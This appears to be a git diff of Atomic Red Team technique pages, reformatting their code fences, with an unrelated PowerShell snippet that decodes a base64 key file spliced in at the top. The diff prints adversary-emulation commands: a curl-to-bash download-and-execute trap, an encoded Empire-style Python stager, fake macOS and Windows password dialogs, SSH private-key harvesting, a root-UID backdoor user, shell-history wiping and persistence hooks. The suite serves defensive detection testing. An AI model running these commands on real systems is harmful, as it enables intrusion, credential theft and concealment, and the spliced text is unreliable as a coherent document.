$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
diff --git a/atomics/T1122/T1122.md b/atomics/T1122/T1122.md
index e252d504..82bcad69 100644
--- a/atomics/T1122/T1122.md
+++ b/atomics/T1122/T1122.md
@@ -15,8 +15,7 @@ Hijack COM Object used by certutil.exe
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg import ..\src\COMHijack.reg
certutil.exe -CAInfo
reg import ..\src\COMHijackCleanup.reg
diff --git a/atomics/T1123/T1123.md b/atomics/T1123/T1123.md
index a15b88cc..da5bd268 100644
--- a/atomics/T1123/T1123.md
+++ b/atomics/T1123/T1123.md
@@ -25,8 +25,7 @@ Create a file called test.wma, with the duration of 30 seconds
| output_file | Path to the recording file being captured | Path | test.wma|
| duration_hms | Duration of audio to be recorded (in h:m:s format) | Path | 30|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
```
@@ -38,8 +37,7 @@ SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
```
diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md
index 018d215e..baf90010 100644
--- a/atomics/T1124/T1124.md
+++ b/atomics/T1124/T1124.md
@@ -24,8 +24,7 @@ Identify the system time
|------|-------------|------|---------------|
| computer_name | computer name to query | string | computer1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net time \\#{computer_name}
w32tm /tz
```
@@ -38,8 +37,7 @@ Identify the system time via PowerShell
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Get-Date
```
diff --git a/atomics/T1126/T1126.md b/atomics/T1126/T1126.md
index 4093e693..864ae9de 100644
--- a/atomics/T1126/T1126.md
+++ b/atomics/T1126/T1126.md
@@ -26,8 +26,7 @@ Add a Network Share utilizing the command_prompt
|------|-------------|------|---------------|
| share_name | Share to add. | string | \\test\share|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net use c: #{share_name}
net share test=#{share_name} /REMARK:"test share" /CACHE:No
```
@@ -45,8 +44,7 @@ Removes a Network Share utilizing the command_prompt
|------|-------------|------|---------------|
| share_name | Share to remove. | string | \\test\share|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net share #{share_name} /delete
```
@@ -63,8 +61,7 @@ Removes a Network Share utilizing PowerShell
|------|-------------|------|---------------|
| share_name | Share to remove. | string | \\test\share|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Remove-SmbShare -Name #{share_name}
Remove-FileShare -Name #{share_name}
```
diff --git a/atomics/T1127/T1127.md b/atomics/T1127/T1127.md
index 024c9d09..946a087a 100644
--- a/atomics/T1127/T1127.md
+++ b/atomics/T1127/T1127.md
@@ -52,8 +52,7 @@ Executes the code in a project file using. C# Example
|------|-------------|------|---------------|
| filename | Location of the project file | Path | T1127.csproj|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
```
diff --git a/atomics/T1128/T1128.md b/atomics/T1128/T1128.md
index 36a75917..41717a40 100644
--- a/atomics/T1128/T1128.md
+++ b/atomics/T1128/T1128.md
@@ -24,8 +24,7 @@ Netsh interacts with other operating system components using dynamic-link librar
|------|-------------|------|---------------|
| helper_file | Path to DLL | Path | C:\Path\file.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
netsh.exe add helper #{helper_file}
```
diff --git a/atomics/T1130/T1130.md b/atomics/T1130/T1130.md
index 7f5938ff..09ba3e87 100644
--- a/atomics/T1130/T1130.md
+++ b/atomics/T1130/T1130.md
@@ -29,8 +29,7 @@ Creates a root CA with openssl
| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
| cert_filename | Path of the CA certificate we create | Path | rootCA.crt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
openssl genrsa -out #{key_filename} 4096
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename}
diff --git a/atomics/T1132/T1132.md b/atomics/T1132/T1132.md
index 9f787156..02c2487c 100644
--- a/atomics/T1132/T1132.md
+++ b/atomics/T1132/T1132.md
@@ -21,8 +21,7 @@ Utilizing a common technique for posting base64 encoded data.
| destination_url | Destination URL to post encoded data. | string | redcanary.com|
| base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}
```
diff --git a/atomics/T1134/T1134.md b/atomics/T1134/T1134.md
index d800911d..88041e05 100644
--- a/atomics/T1134/T1134.md
+++ b/atomics/T1134/T1134.md
@@ -35,8 +35,7 @@ Requires Administrator Privileges To Execute Test
|------|-------------|------|---------------|
| target_user | Username To Steal Token From | String | SYSTEM|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
#list processes by user,
$owners = @{}
diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md
index 04f1b719..66fc9d61 100644
--- a/atomics/T1135/T1135.md
+++ b/atomics/T1135/T1135.md
@@ -36,8 +36,7 @@ Network Share Discovery
|------|-------------|------|---------------|
| computer_name | Computer name to find a mount on. | string | computer1|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
df -aH
smbutil view -g //#{computer_name}
showmount #{computer_name}
@@ -56,8 +55,7 @@ Network Share Discovery utilizing the command prompt
|------|-------------|------|---------------|
| computer_name | Computer name to find a mount on. | string | computer1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net view \\#{computer_name}
```
@@ -74,8 +72,7 @@ Network Share Discovery utilizing PowerShell
|------|-------------|------|---------------|
| computer_name | Computer name to find a mount on. | string | computer1|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
net view \\#{computer_name}
get-smbshare -Name #{computer_name}
```
diff --git a/atomics/T1136/T1136.md b/atomics/T1136/T1136.md
index a696863c..ac02069b 100644
--- a/atomics/T1136/T1136.md
+++ b/atomics/T1136/T1136.md
@@ -31,8 +31,7 @@ Create a user via useradd
| username | Username of the user to create | String | evil_user|
| comment | Comment to record when creating the user | String | Evil Account|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
```
@@ -50,8 +49,7 @@ Creates a user on a MacOS system with dscl
| username | Username of the user to create | String | evil_user|
| realname | 'realname' to record when creating the user | String | Evil Account|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/bash
dscl . -create /Users/#{username} RealName "#{realname}"
@@ -73,8 +71,7 @@ Creates a new user in a command prompt
|------|-------------|------|---------------|
| username | Username of the user to create | String | Evil Account|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net user /add #{username}
```
@@ -91,8 +88,7 @@ Creates a new user in PowerShell
|------|-------------|------|---------------|
| username | Username of the user to create | String | Evil Account|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
New-LocalUser -Name #{username} -NoPassword
net user /add #{username}
```
@@ -111,8 +107,7 @@ Creates a new user in Linux and adds the user to the `root` group. This techniqu
| username | Username of the user to create | String | butter|
| password | Password of the user to create | String | BetterWithButter|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
echo "#{password}" | passwd --stdin #{username}
```
diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md
index 9e4c5da7..03073720 100644
--- a/atomics/T1137/T1137.md
+++ b/atomics/T1137/T1137.md
@@ -58,8 +58,7 @@ Word VBA Macro
**Supported Platforms:** Windows
-#### Run it with these steps!
-1. Open Word
+#### Run it with these steps! 1. Open Word
2. Insert tab -> Quick Parts -> Field
diff --git a/atomics/T1138/T1138.md b/atomics/T1138/T1138.md
index ee5354a1..92348bd7 100644
--- a/atomics/T1138/T1138.md
+++ b/atomics/T1138/T1138.md
@@ -36,8 +36,7 @@ place to start.
|------|-------------|------|---------------|
| file_path | Path to the shim databaase file | String | C:\AtomicRedTeam\atomics\T1138\src\AtomicShimx86.sdb|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
sdbinst.exe #{file_path}
sdbinst.exe -u #{file_path}
```
diff --git a/atomics/T1139/T1139.md b/atomics/T1139/T1139.md
index 3097ce34..94087c72 100644
--- a/atomics/T1139/T1139.md
+++ b/atomics/T1139/T1139.md
@@ -22,8 +22,7 @@ xxxx
| bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
```
diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md
index 06c3d588..4434a757 100644
--- a/atomics/T1140/T1140.md
+++ b/atomics/T1140/T1140.md
@@ -28,8 +28,7 @@ Encode/Decode executable
|------|-------------|------|---------------|
| executable | name of executable | path | c:\file.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
certutil.exe -encode #{executable} file.txt
certutil.exe -decode file.txt #{executable}
```
@@ -47,8 +46,7 @@ Rename certutil and decode a file. This is in reference to latest research by Fi
|------|-------------|------|---------------|
| executable | name of executable/file to decode | path | c:\file.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp
cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt
```
diff --git a/atomics/T1141/T1141.md b/atomics/T1141/T1141.md
index f0e57adc..0ef81bf2 100644
--- a/atomics/T1141/T1141.md
+++ b/atomics/T1141/T1141.md
@@ -20,8 +20,7 @@ Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.htm
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
```
@@ -35,8 +34,7 @@ Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe -command {$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo $cred.GetNetworkCredential().Password;}
```
diff --git a/atomics/T1142/T1142.md b/atomics/T1142/T1142.md
index 92e64cf0..c17dc5e0 100644
--- a/atomics/T1142/T1142.md
+++ b/atomics/T1142/T1142.md
@@ -27,8 +27,7 @@ To manage their credentials, users have to use additional credentials to access
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
security -h
security find-certificate -a -p > allcerts.pem
security import /tmp/certs.pem -k
diff --git a/atomics/T1144/T1144.md b/atomics/T1144/T1144.md
index 38d30726..9f3bd167 100644
--- a/atomics/T1144/T1144.md
+++ b/atomics/T1144/T1144.md
@@ -24,8 +24,7 @@ Gatekeeper Bypass via command line
|------|-------------|------|---------------|
| app_path | Path to app to be used | Path | myapp.app|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo xattr -r -d com.apple.quarantine #{app_path}
sudo spctl --master-disable
```
diff --git a/atomics/T1145/T1145.md b/atomics/T1145/T1145.md
index ca7e31da..61780990 100644
--- a/atomics/T1145/T1145.md
+++ b/atomics/T1145/T1145.md
@@ -29,8 +29,7 @@ File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
echo "ATOMICREDTEAM" > %windir%\cert.key
dir c:\ /b /s .key | findstr /e .key
```
@@ -48,8 +47,7 @@ Discover private SSH keys on a macOS or Linux system.
|------|-------------|------|---------------|
| output_file | Output file containing locations of SSH key files | path | /tmp/keyfile_locations.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
find / -name id_rsa >> #{output_file}
find / -name id_dsa >> #{output_file}
```
@@ -67,8 +65,7 @@ Copy private SSH keys on a Linux system to a staging folder using the `cp` comma
|------|-------------|------|---------------|
| output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
mkdir #{output_folder}
find / -name id_rsa -exec cp --parents {} #{output_folder} \;
find / -name id_dsa -exec cp --parents {} #{output_folder} \;
@@ -87,8 +84,7 @@ Copy private SSH keys on a Linux or macOS system to a staging folder using the `
|------|-------------|------|---------------|
| output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
mkdir #{output_folder}
find / -name id_rsa -exec rsync -R {} #{output_folder} \;
find / -name id_dsa -exec rsync -R {} #{output_folder} \;
diff --git a/atomics/T1146/T1146.md b/atomics/T1146/T1146.md
index 30302a12..8a928645 100644
--- a/atomics/T1146/T1146.md
+++ b/atomics/T1146/T1146.md
@@ -25,8 +25,7 @@ Clears bash history via rm
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
rm ~/.bash_history
```
@@ -38,8 +37,7 @@ Clears bash history via rm
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
echo "" > ~/.bash_history
```
@@ -51,8 +49,7 @@ Clears bash history via cat /dev/null
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
cat /dev/null > ~/.bash_history
```
@@ -64,8 +61,7 @@ Clears bash history via a symlink to /dev/null
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
ln -sf /dev/null ~/.bash_history
```
@@ -77,8 +73,7 @@ Clears bash history via truncate
**Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
truncate -s0 ~/.bash_history
```
@@ -90,8 +85,7 @@ Clears the history of a bunch of different shell types by setting the history si
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
unset HISTFILE
export HISTFILESIZE=0
history -c
diff --git a/atomics/T1147/T1147.md b/atomics/T1147/T1147.md
index b70b2c8a..bf4d0884 100644
--- a/atomics/T1147/T1147.md
+++ b/atomics/T1147/T1147.md
@@ -20,8 +20,7 @@ Add a hidden user on MacOS
|------|-------------|------|---------------|
| user_name | username to add | string | APT|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo dscl . -create /Users/#{user_name} UniqueID 333
```
diff --git a/atomics/T1148/T1148.md b/atomics/T1148/T1148.md
index f91f71ff..898b2636 100644
--- a/atomics/T1148/T1148.md
+++ b/atomics/T1148/T1148.md
@@ -22,8 +22,7 @@ Disables history collection in shells
|------|-------------|------|---------------|
| evil_command | Command to run after shell history collection is disabled | String | whoami|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
export HISTCONTROL=ignoreboth
ls #{evil_command}
```
@@ -36,8 +35,7 @@ xxx
**Supported Platforms:** macOS, Linux
-#### Run it with these steps!
-1. export HISTCONTROL=ignoreboth
+#### Run it with these steps! 1. export HISTCONTROL=ignoreboth
2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
3. ls
4. whoami > recon.txt
diff --git a/atomics/T1150/T1150.md b/atomics/T1150/T1150.md
index dd7c9b94..66a2ae33 100644
--- a/atomics/T1150/T1150.md
+++ b/atomics/T1150/T1150.md
@@ -16,8 +16,7 @@ Modify MacOS plist file in one of two directories
**Supported Platforms:** macOS
-#### Run it with these steps!
-1. Modify a .plist in
+#### Run it with these steps! 1. Modify a .plist in
/Library/Preferences
diff --git a/atomics/T1151/T1151.md b/atomics/T1151/T1151.md
index d8b93332..2d783174 100644
--- a/atomics/T1151/T1151.md
+++ b/atomics/T1151/T1151.md
@@ -17,8 +17,7 @@ Space After Filename
**Supported Platforms:** macOS
-#### Run it with these steps!
-1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt
+#### Run it with these steps! 1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt
2. mv execute.txt "execute.txt "
diff --git a/atomics/T1152/T1152.md b/atomics/T1152/T1152.md
index 79b0ace6..c3f45a96 100644
--- a/atomics/T1152/T1152.md
+++ b/atomics/T1152/T1152.md
@@ -17,8 +17,7 @@ Utilize launchctl
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
```
diff --git a/atomics/T1153/T1153.md b/atomics/T1153/T1153.md
index b3acc2e5..7e727d4d 100644
--- a/atomics/T1153/T1153.md
+++ b/atomics/T1153/T1153.md
@@ -19,8 +19,7 @@ Creates a script and executes it using the source command
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
chmod +x /tmp/art.sh
source /tmp/art.sh
@@ -34,8 +33,7 @@ Creates a script and executes it using the source command's dot alias
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
chmod +x /tmp/art.sh
. /tmp/art.sh
diff --git a/atomics/T1154/T1154.md b/atomics/T1154/T1154.md
index ba1a1319..77f82572 100644
--- a/atomics/T1154/T1154.md
+++ b/atomics/T1154/T1154.md
@@ -17,8 +17,7 @@ After sending a keyboard interrupt (CTRL+C) the script will download and execute
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT
exit
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT
diff --git a/atomics/T1155/T1155.md b/atomics/T1155/T1155.md
index 08cefc48..cd8c0306 100644
--- a/atomics/T1155/T1155.md
+++ b/atomics/T1155/T1155.md
@@ -22,8 +22,7 @@ https://github.com/EmpireProject/Empire
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\" | python &""
```
diff --git a/atomics/T1156/T1156.md b/atomics/T1156/T1156.md
index 1d81f042..f0fae3f9 100644
--- a/atomics/T1156/T1156.md
+++ b/atomics/T1156/T1156.md
@@ -26,8 +26,7 @@ Adds a command to the .bash_profile file of the current user
|------|-------------|------|---------------|
| command_to_add | Command to add to the .bash_profile file | string | /path/to/script.py|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
echo "#{command_to_add}" >> ~/.bash_profile
```
@@ -44,8 +43,7 @@ Adds a command to the .bashrc file of the current user
|------|-------------|------|---------------|
| command_to_add | Command to add to the .bashrc file | string | /path/to/script.py|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
echo "#{command_to_add}" >> ~/.bashrc
```
diff --git a/atomics/T1158/T1158.md b/atomics/T1158/T1158.md
index f74d5e1c..18029818 100644
--- a/atomics/T1158/T1158.md
+++ b/atomics/T1158/T1158.md
@@ -52,8 +52,7 @@ Creates a hidden file inside a hidden directory
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
```
@@ -66,8 +65,7 @@ Hide a file on MacOS
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00"
```
@@ -85,8 +83,7 @@ mv file to a .file
| filename | path of file to hide | path | /tmp/evil|
| output_filename | output path of file | path | /tmp/evil|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
mv #{filename} .#{output_filename}
```
@@ -103,8 +100,7 @@ Creates a file and marks it as a system file using the attrib.exe utility.
|------|-------------|------|---------------|
| filename | path of file to mark as system | path | C:\Windows\Temp\sensitive_file.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
attrib.exe +s #{filename}
```
@@ -121,8 +117,7 @@ Creates a file and marks it as hidden using the attrib.exe utility.
|------|-------------|------|---------------|
| filename | path of file to mark as hidden | path | C:\Windows\Temp\sensitive_file.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
attrib.exe +h #{filename}
```
@@ -139,8 +134,7 @@ Requires Apple Dev Tools
|------|-------------|------|---------------|
| filename | path of file to hide | path | /tmp/evil|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
setfile -a V #{filename}
```
@@ -157,8 +151,7 @@ Hide a directory on MacOS
|------|-------------|------|---------------|
| filename | path of file to hide | path | /tmp/evil|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
chflags hidden #{filename}
```
@@ -170,8 +163,7 @@ Show all hidden files on MacOS
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
defaults write com.apple.finder AppleShowAllFiles YES
```
@@ -183,8 +175,7 @@ Create visible directories on MacOS and Linux
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
mkdir visible-directory
echo "this file is visible" > visible-directory/visible-file
ls
@@ -199,8 +190,7 @@ Create hidden directories and files on Nix platforms
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
ls -la
@@ -221,8 +211,7 @@ Create an Alternate Data Stream with the command prompt. Write access is require
| file_name | File name of file to create ADS on. | string | test.txt|
| ads_filename | Name of ADS file. | string | adstest.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
echo "test" > #{file_name}:#{ads_filename}
echo "test" > :#{ads_filename}
dir /s /r | find ":$DATA"
@@ -242,8 +231,7 @@ Create an Alternate Data Stream with PowerShell. Write access is required.
| file_name | File name of file to create ADS on. | string | test.txt|
| ads_filename | Name of ADS file. | string | adstest.txt|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
set-content -path #{file_name} -stream #{ads_filename} -value "test2"
set-content -path . -stream #{ads_filename} -value "test3"
diff --git a/atomics/T1159/T1159.md b/atomics/T1159/T1159.md
index fbdfa811..c6719a73 100644
--- a/atomics/T1159/T1159.md
+++ b/atomics/T1159/T1159.md
@@ -17,8 +17,7 @@ Create a plist and execute it
**Supported Platforms:** macOS
-#### Run it with these steps!
-1. Create file - .client
+#### Run it with these steps! 1. Create file - .client
2. osascript -e 'tell app "Finder" to display dialog "Hello World"'
diff --git a/atomics/T1160/T1160.md b/atomics/T1160/T1160.md
index 6c5f7fb5..b68acc20 100644
--- a/atomics/T1160/T1160.md
+++ b/atomics/T1160/T1160.md
@@ -19,8 +19,7 @@ Utilize LaunchDaemon to launch `Hello World`
**Supported Platforms:** macOS
-#### Run it with these steps!
-1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons
+#### Run it with these steps! 1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons
2.
diff --git a/atomics/T1163/T1163.md b/atomics/T1163/T1163.md
index fa796830..576f6f10 100644
--- a/atomics/T1163/T1163.md
+++ b/atomics/T1163/T1163.md
@@ -19,8 +19,7 @@ Modify rc.common
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
```
diff --git a/atomics/T1164/T1164.md b/atomics/T1164/T1164.md
index 60fc1e91..9b572276 100644
--- a/atomics/T1164/T1164.md
+++ b/atomics/T1164/T1164.md
@@ -21,8 +21,7 @@ Plist Method
**Supported Platforms:** macOS
-#### Run it with these steps!
-1. create a custom plist:
+#### Run it with these steps! 1. create a custom plist:
~/Library/Preferences/com.apple.loginwindow.plist
@@ -47,8 +46,7 @@ Mac Defaults
|------|-------------|------|---------------|
| script | path to script | path | /path/to/script|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo defaults write com.apple.loginwindow LoginHook #{script}
sudo defaults delete com.apple.loginwindow LoginHook
```
diff --git a/atomics/T1165/T1165.md b/atomics/T1165/T1165.md
index 2d5f7e50..bd9b8467 100644
--- a/atomics/T1165/T1165.md
+++ b/atomics/T1165/T1165.md
@@ -21,8 +21,7 @@ Modify or create an file in StartupItems
**Supported Platforms:** macOS
-#### Run it with these steps!
-1. /Library/StartupItems/StartupParameters.plist
+#### Run it with these steps! 1. /Library/StartupItems/StartupParameters.plist
@@ -39,8 +38,7 @@ Establish persistence via a rule run by emond daemon at startup, based on https:
|------|-------------|------|---------------|
| plist | Path to emond plist file | path | /path/to/T1165_emond.plist|
